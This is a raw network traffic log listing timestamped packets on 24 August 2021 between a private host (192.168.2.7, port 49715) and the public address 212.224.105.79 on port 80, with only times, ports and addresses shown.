Aug 24, 2021 08:46:56.475701094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475718975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475737095 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475773096 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.486270905 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.497880936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.497917891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.497931004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.497942924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.497956038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.497976065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.497994900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498008966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498020887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498034954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498048067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498060942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498074055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498086929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498090982 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498100042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498111963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498125076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498138905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498142958 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498153925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498162985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498167038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498179913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498187065 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498193026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498204947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498209000 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498218060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498230934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498244047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498253107 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498256922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498270035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498282909 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498306036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498306036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498322964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498327017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498336077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498349905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498363018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498374939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498389006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498393059 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498400927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498414040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498425961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498439074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498447895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498461008 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498461008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498475075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498492002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498505116 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498507977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498527050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498537064 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498539925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498553991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498565912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498579025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498584032 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498590946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498604059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498615980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498625040 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498629093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498641014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498653889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498660088 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498667002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498681068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498682976 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498693943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498704910 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498707056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498718023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498730898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498744011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498756886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498759985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498769045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.498794079 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498823881 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.498974085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.508502007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.508533955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.508550882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.508635998 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521241903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521272898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521289110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521305084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521321058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521339893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521358013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521373987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521389961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521405935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521420956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521425009 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521437883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521454096 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521455050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521465063 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521473885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521497965 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521512985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521514893 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521531105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521545887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521562099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521576881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521584034 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521596909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521611929 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521614075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521630049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521646023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521653891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521661997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521677017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521691084 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521693945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521709919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521722078 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521728992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521745920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521749973 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521761894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521776915 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521778107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521794081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521809101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521816015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521826029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521840096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521858931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521861076 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521876097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521884918 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521892071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521908045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521913052 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521924019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521939993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521955967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521958113 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.521971941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.521991014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522005081 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.522007942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522022963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522027016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.522039890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522056103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522072077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522084951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522085905 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.522097111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522109032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522120953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522136927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522147894 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.522154093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522173882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522182941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.522192955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522208929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522224903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522241116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.522255898 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.522325039 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.522541046 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.530641079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.530658960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.530673027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.530697107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.530714035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.530765057 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.530839920 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.544229984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544317961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544348955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544375896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544404030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544421911 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.544430971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544445038 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.544464111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544492960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544504881 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.544519901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544534922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.544548035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544574022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544575930 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.544599056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544627905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544629097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.544682980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544713020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544733047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.544739008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544765949 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.544766903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544794083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544811964 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.544819117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544873953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544881105 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.544903040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544929028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544960976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.544964075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.544991970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545021057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545030117 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545047045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545068979 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545073986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545099974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545126915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545166016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545202017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545208931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545239925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545265913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545291901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545293093 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545320034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545341015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545353889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545384884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545413971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545440912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545444965 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545456886 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545466900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545492887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545520067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545536041 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545546055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545567036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545578003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545608044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545629025 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545639992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545675039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545691967 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545708895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545757055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545768023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545795918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545821905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545850992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545869112 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545876980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545898914 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545909882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545941114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545952082 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.545968056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.545995951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.546020985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.546022892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.546049118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.546075106 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.546076059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.546128988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.546159983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.546181917 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.546211958 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.552824974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.552875042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.552900076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.552926064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.553050041 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568186045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568214893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568239927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568262100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568284035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568286896 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568305016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568326950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568327904 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568347931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568356991 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568370104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568389893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568411112 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568413973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568437099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568439960 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568458080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568479061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568499088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568514109 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568519115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568541050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568551064 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568573952 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568629026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568650007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568697929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568717957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568728924 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568741083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568762064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568777084 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568792105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568804026 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568814039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568862915 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568885088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568907022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568947077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568978071 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.568988085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.568995953 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569010973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569031954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569052935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569073915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.569082022 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.569094896 CEST	80	49715	212.224.105.79	192.168.2.7
